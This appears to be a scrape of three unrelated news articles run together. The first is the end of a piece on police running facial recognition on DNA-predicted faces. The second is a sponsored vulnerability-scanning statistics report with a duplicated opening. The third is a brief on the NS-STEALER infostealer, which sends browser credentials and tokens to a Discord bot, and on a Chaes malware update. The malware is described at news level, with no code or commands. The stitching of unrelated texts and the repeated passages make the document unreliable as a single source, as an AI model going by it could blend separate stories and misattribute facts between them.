Lynch, of the Electronic Frontier Foundation, tells WIRED that while she is sympathetic to detectives wanting to bring closure for the family, the risks of misidentification with this use case are too great. “I think it goes to show a complete misunderstanding about the high-risk errors of facial recognition,” Lynch says. “It’s surprising to me that cops think this kind of technology will produce leads that they can actually use.”

Phenotyping is often a last resort that departments try only after they’ve exhausted other leads. According to Parabon NanoLabs, the majority of cases it works on do not actually get to the facial composite stage. “I joke that my phenotyping can tell you if your suspect has blue eyes, but my genealogist can tell you the guy’s address,” Greytak says.

The fact that law enforcement investigators consider using these predictions in conjunction with facial recognition speaks to a general lack of oversight over investigatory tools, experts say. There are no federal rules that limit the types of images police can use with face recognition software, and it’s up to both the police departments and the facial recognition vendor to implement and enforce safeguards.

According to a report released in September by the US Government Accountability Office, only 5 percent of the 196 FBI agents who have access to facial recognition technology from outside vendors have completed any training on how to properly use the tools. The report notes that the agency also lacks any internal policies for facial recognition to safeguard against privacy and civil liberties abuses.

In the past few years, facial recognition has improved considerably. In 2018, when the National Institute of Standards and Technology tested face recognition algorithms on a mug shot database of 12 million people, it found that 99.9 percent of searches identified the correct person. However, the NIST also found disparities in how the algorithms it tested performed across demographic groups.

Crucially, the NIST tested these algorithms only with high-quality images like driver's license and passport photos; law enforcement is often less discerning. A 2019 report from Georgetown’s Center on Privacy and Technology written by Clare Garvie, a facial recognition expert and privacy lawyer, found that law enforcement agencies nationwide have used facial recognition tools on images that include blurry surveillance camera shots, manipulated photos of suspects, and even composite sketches created by traditional artists.

According to an internal New York Police Department presentation cited by Garvie in her report, NYPD detective Tom Markiewicz wrote in 2018 that the department has tried running face recognition on forensic sketches and found that “sketches do not work.” In another infamous example that Garvie cites in her report, a detective from the NYPD’s Facial Identification Section, after noting that a suspect looked like the actor Woody Harrelson, put a photo of the actor through the department’s facial recognition tool.

“Because modern facial recognition algorithms are trained neural networks, we just don’t know exactly what criteria the systems use to identify a face,” Garvie, who now works at the National Association of Criminal Defense Lawyers, tells WIRED. “Daisy chaining unreliable or imprecise black-box tools together is simply going to produce unreliable results,” she says.

“We should know this by now.”

Cops Used DNA to Predict a Suspect’s Face—and Tried to Run Facial Recognition on It

We analyzed 2,5 million vulnerabilities we discovered in our customer’s assets. This is what we found.

Digging into the data
The dataset we analyze here is representative of a subset of clients that subscribe to our vulnerability scanning services. Assets scanned include those reachable across the Internet, as well as those present on internal networks. The data includes findings for network

**_We analyzed 2,5 million vulnerabilities we discovered in our customer's assets. This is what we found._****Digging into the data**

The dataset we analyze here is representative of a subset of clients that subscribe to our vulnerability scanning services. Assets scanned include those reachable across the Internet, as well as those present on internal networks. The data includes findings for network equipment, desktops, web servers, database servers, and even the odd document printer or scanning device.

The number of organizations in this dataset is smaller (3 less) than the previous dataset used in last year's Security Navigator 2023 and some organizations were replaced by new additions. With the change of organizations comes a different mix of assets, which leaves comparing the previous results akin to comparing apples to oranges (we might be biased), but it's still worth noting similar patterns where possible.

This year, we revisit the menacing vulnerability theme with an eye on the ever-present and lingering tail of unresolved system weaknesses. The waves of newly discovered serious issues are just for our attention with existing unresolved issues, seeming like a hydra that keeps on growing new snaking heads as soon as you dispatch others.

Assessing whether a system is adequately protected is a challenge that requires skill and expertise and can take a lot of time. But we want to learn of any weaknesses beforehand rather than having to deal with the fallout of an unplanned "free pentest" by a random Cy-X group.

**Security Navigator 2024 is Here - Download Now#**

The newly released Security Navigator 2024 offers critical insights into current digital threats, documenting 129,395 incidents and 25,076 confirmed breaches. More than just a report, it serves as a guide to navigating a safer digital landscape.

****What's Inside?**#**

*   📈 **In-Depth Analysis:** Explore trends, attack patterns, and predictions. Learn from case studies in CyberSOC and Pentesting.
*   🔮 **Future-Ready:** Equip yourself with our security predictions and research summary.
*   👁️ **Real-Time Data:** From Dark Net surveillance to industry-specific statistics.

Stay one step ahead in cybersecurity. Your essential guide awaits!

🔗 Get Your Copy Now

**Vulnerability Scanning Findings by Severity**

Examining the severity rating share per unique Finding we see that the bulk of unique Findings, 79%, are classified as 'High' or 'Medium'. However, it is also worth noting that half, 50.4%, of unique Findings are considered 'Critical' or 'High.'

The average number of 'Critical' or 'High' Findings has decreased by 52.17% and 43.83%, respectively, compared to our previously published results. An improvement can also be observed for Findings with severity ratings 'Medium' and 'Low' being down 29.92% and 28.76%. As this report uses a slightly different sample of clients to last year, a YoY comparison has limited value, but we see evidence that clients are responding well to the findings we report, resulting in an overall improvement.

The majority of Findings (78%) rated 'Critical' or 'High' are 30 days or younger (when looking at a 120-day window). Conversely, 18% of all findings rated 'Critical' or 'High' are 150-days or older. From a prioritization perspective, 'Critical' or 'High' real findings seem to be dealt with swiftly, but some residual still accumulates over time. We see, therefore, that unresolved Findings continue to grow older. Indeed, ~35% of all unique CVEs are from findings 120 days or older.

The chart above shows the long tail of unresolved real findings. Note the first remarkable long tail peak around 660 days and the second one at 1380 days (3 years and 10 months).

**A window of opportunity**

The high average numbers of 'Critical' and 'High' findings are largely influenced by assets running Microsoft Windows or Microsoft Windows Server operating systems. Assets running operating systems other than Microsoft, such as Linux-based OS, are present, but these are reported proportionally far less.

We should note, however, that the 'Critical' or 'High' findings associated with assets running Windows are not necessarily vulnerabilities in the operating system but can also be related to applications running on the asset.

It is perhaps understandable that unsupported Microsoft Windows and Windows Server versions are prominent here, but it is surprising to find more recent versions of these operating systems with severities rated as 'Critical' or 'High'.

**Industry perspective**

We are using NAICS for our industry classification. The results here only consider Findings based on scans of hosts rather than services such as web applications. The average unique real Finding per unique asset is 31.74 across all organizations, denoted by the dashed horizontal line in the chart below.

Our clients in the Construction industry appear to be performing exceptionally well compared to clients in other industries, with an average of 12.12 Findings per Asset. At the opposite end of the spectrum, we have the Mining, Quarrying, and Oil and Gas industries, where we report an average of 76.25 unique findings per asset. Clients in Public Administration surprised us by outperforming Finance and Insurance with an average of 35.3 Findings per Asset, compared with 43.27, despite the larger number of Assets. Of course, these values are derived from the set of clients present in our sample and may not represent the universal reality.

When comparing the average severity per unique asset per Industry, we see a mixed picture. We can ignore Health Care and Social Assistance and Information, with a relatively small unique asset count, that results in averages that are disproportionate in relation to other Industries.

Our overall Industry average for Severity rating High is 21.93 and Mining, Quarrying and Oil and Gas Extraction have more than double that average.

Similarly, Finance and Insurance with Accommodation and Food Services also overshot the overall average by 10.2 and 3.4 findings per unique asset, respectively. The same three Industries exceeded the overall average for findings rated Critical, with Accommodation and Food Servers doing so by almost a factor of 3.

**Vulnerability is getting old**

As we revisit the menacing vulnerability theme this year, we once again look suspiciously at the ever-present and lingering tale of unresolved system weaknesses that are just getting older. We assessed over 2.5m vulnerability findings that we reported to our clients and over 1,500 reports from our professional ethical hackers to understand the current state of security vulnerabilities and consider their role and effectiveness as a tool for prioritization.

The bulk of unique Findings reported by our scanning teams - 79% - are classified as 'High' or 'Medium,' and 18% of all serious findings are 150 days or older. Though these are generally dealt with more swiftly than others, some residuals still accumulate over time. While most findings we identify are resolved after 90 days, 35% of all findings we report persist for 120 days or longer. And way too many are never addressed at all.

Our scanning results illuminate the persistent problem of unpatched vulnerabilities. Meanwhile, our Ethical Hacking teams more frequently encounter newer applications and systems built on contemporary platforms, frameworks, and languages.

The role of the Ethical Hacker is to conduct Penetration Tests – to emulate a malicious attacker and assess a system, application, device, or even people for vulnerabilities that could be used to gain access or deny access to IT resources.

Penetration Testing is generally considered a component of Vulnerability Management but could also be seen as a form of Threat Intelligence that businesses should leverage as part of their proactive defense strategy.

17.67% of findings our Ethical Hackers reported were rated as 'Serious', but, on a brighter note, hackers must work harder today to discover them than they had to in the past.

This is just an excerpt of the analysis. More details on our analysis of vulnerabilities and Pentesting (as well as a ton of other interesting research topics like VERIS categorization of the incidents handled in our CyberSOCs, Cyber Extortion statistics and an analysis of Hacktivism) can be found in the **Security Navigator**. Just fill in the form and get your download. It's worth it!

**Note:** _This informative piece has been expertly crafted and generously shared by Charl van der Walt, Head of the Security Research Center, Orange Cyberdefense._

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

52% of Serious Vulnerabilities We Find are Related to Windows 10

Cybersecurity researchers have discovered a new Java-based "sophisticated" information stealer that uses a Discord bot to exfiltrate sensitive data from compromised hosts.

The malware, named NS-STEALER, is propagated via ZIP archives masquerading as cracked software, Trellix security researcher Gurumoorthi Ramanathan said in an analysis published last week.

The ZIP file contains

Browser Security / Cyber Threat

Cybersecurity researchers have discovered a new Java-based "sophisticated" information stealer that uses a Discord bot to exfiltrate sensitive data from compromised hosts.

The malware, named **NS-STEALER**, is propagated via ZIP archives masquerading as cracked software, Trellix security researcher Gurumoorthi Ramanathan said in an analysis published last week.

The ZIP file contains within it a rogue Windows shortcut file ("Loader GAYve"), which acts as a conduit to deploy a malicious JAR file that first creates a folder called "NS-<11-digit\_random\_number>" to store the harvested data.

To this folder, the malware subsequently saves screenshots, cookies, credentials, and autofill data stolen from over two dozen web browsers, system information, a list of installed programs, Discord tokens, Steam and Telegram session data. The captured information is then exfiltrated to a Discord Bot channel.

"Considering the highly sophisticated function of gathering sensitive information and using X509Certificate for supporting authentication, this malware can quickly steal information from the victim systems with \[Java Runtime Environment\]," Ramanathan said.

"The Discord bot channel as an EventListener for receiving exfiltrated data is also cost-effective."

The development comes as the threat actors behind the Chaes (aka Chae$) malware have released an update (version 4.1) to the information stealer with improvements to its Chronod module, which is responsible for pilfering login credentials entered in web browsers and intercepting crypto transactions.

Infection chains distributing the malware, per Morphisec, leverage legal-themed email lures written in Portuguese to deceive recipients into clicking on bogus links to deploy a malicious installer to activate Chae$ 4.1.

But in an interesting twist, the developers also left behind messages for security researcher Arnold Osipov – who has extensively analyzed Chaes in the past – expressing gratitude for helping them improve their "software" directly within the source code.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web